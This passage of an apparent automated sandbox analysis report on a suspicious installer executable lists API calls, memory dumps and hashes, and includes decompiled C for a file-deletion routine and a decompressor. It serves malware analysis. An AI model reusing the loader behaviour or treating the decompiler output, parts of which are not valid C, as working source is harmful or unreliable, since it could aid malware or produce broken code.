                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,C:\Users\user\Desktop\RHK098760045678009000.exe 0,00000000,00000020), ref: 0040336A
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00409148,C:\Users\user~1\AppData\Local\Temp\,~nsu,C:\Users\user\Desktop\RHK098760045678009000.exe 0,00000000,00000020), ref: 00403379
                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,C:\Users\user\Desktop\RHK098760045678009000.exe 0,00000000,00000020), ref: 00403384
                • lstrcmpiA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,C:\Users\user\Desktop\RHK098760045678009000.exe 0,00000000,00000020), ref: 00403390
                • SetCurrentDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 004033AC
                • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                • CopyFileA.KERNEL32 ref: 0040340A
                • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                • ExitWindowsEx.USER32 ref: 004034E8
                • ExitProcess.KERNEL32 ref: 0040350B
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                • String ID: $ /D=$ _?=$"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RHK098760045678009000.exe$C:\Users\user\Desktop\RHK098760045678009000.exe 0$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$aufce Setup$~nsu
                • API String ID: 3469842172-3853766821
                • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                0x004054c8
                0x004054cc
                0x004054d5
                0x004054d8
                0x004054db
                0x004054e3
                0x004054e5
                0x004054e6
                0x00000000
                0x004054e6
                0x004054f5
                0x004054f5
                0x004054f8
                0x004054fb
                0x0040550f
                0x00405516
                0x0040551b
                0x0040551d
                0x0040552d
                0x0040551f
                0x00405525
                0x00405525
                0x00405532
                0x00405535
                0x00405540
                0x00405546
                0x0040554b
                0x0040555b
                0x0040555d
                0x00405563
                0x00405566
                0x00405569
                0x00405626
                0x00405626
                0x0040562a
                0x0040562c
                0x0040562c
                0x0040562c
                0x0040562c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040556f
                0x0040556f
                0x00405578
                0x0040557e
                0x00405583
                0x00405586
                0x00405588
                0x0040558c
                0x0040558e
                0x0040558e
                0x0040558c
                0x00405591
                0x00405594
                0x004055a7
                0x004055a9
                0x004055ae
                0x004055b5
                0x004055cd
                0x004055d3
                0x004055d9
                0x004055db
                0x00405600
                0x004055dd
                0x004055dd
                0x004055e1
                0x004055f5
                0x004055e3
                0x004055e6
                0x004055ee
                0x004055ee
                0x004055e1
                0x004055b7
                0x004055bd
                0x004055bf
                0x004055c5
                0x004055c5
                0x004055bf
                0x00000000
                0x004055b5
                0x00405596
                0x00405599
                0x0040559b
                0x00000000
                0x00000000
                0x0040559d
                0x0040559f
                0x00000000
                0x00000000
                0x004055a1
                0x004055a5
                0x00000000
                0x00000000
                0x00000000
                0x00405605
                0x0040560f
                0x00405615
                0x00405615
                0x00405620
                0x00000000
                0x00405620
                0x00405537
                0x0040553e
                0x00000000
                0x00000000
                0x00000000
                0x004054fd
                0x004054fd
                0x004054ff
                0x00405630
                0x00405633
                0x00405636
                0x00405688
                0x00405688
                0x00405688
                0x00405638
                0x0040563b
                0x00405646
                0x0040564b
                0x0040564d
                0x00000000
                0x00000000
                0x00405650
                0x00405656
                0x0040565c
                0x00405662
                0x00405664
                0x00000000
                0x00405680
                0x00405666
                0x0040566a
                0x00000000
                0x00000000
                0x0040566f
                0x00000000
                0x00405676
                0x0040563d
                0x0040563d
                0x00000000
                0x0040563d
                0x00405505
                0x00405509
                0x00000000
                0x00000000
                0x00000000
                0x00405509

                APIs
                • DeleteFileA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 004054DB
                • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405525
                • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 00405546
                • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040554C
                • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,?), ref: 0040555D
                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                • FindClose.KERNEL32(?), ref: 00405620
                Strings
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004054C7
                • C:\Users\user\Desktop\RHK098760045678009000.exe 0, xrefs: 004054BD
                • \*.*, xrefs: 0040551F
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop\RHK098760045678009000.exe 0$\*.*
                • API String ID: 2035342205-295642313
                • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF854DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FF855B4
                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421), ref: 6FF855DE
                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16), ref: 6FF855F5
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421), ref: 6FF85617
                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421,00000000,00000000), ref: 6FF8568A
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421), ref: 6FF85695
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,6FF85262,7FC6FA16,6FF85421,00000000), ref: 6FF856E0
                Memory Dump Source
                • Source File: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                • String ID:
                • API String ID: 656311269-0
                • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                • Instruction ID: 15a9098e55853074b10621f1050f0ea71fbece52cbfd70e14ec3269583920160
                • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                • Instruction Fuzzy Hash: 9161A671F00719ABDB10CFB8C884BAEBBB5AF48720F144159E926EB390DB749D41CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 98%
                			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
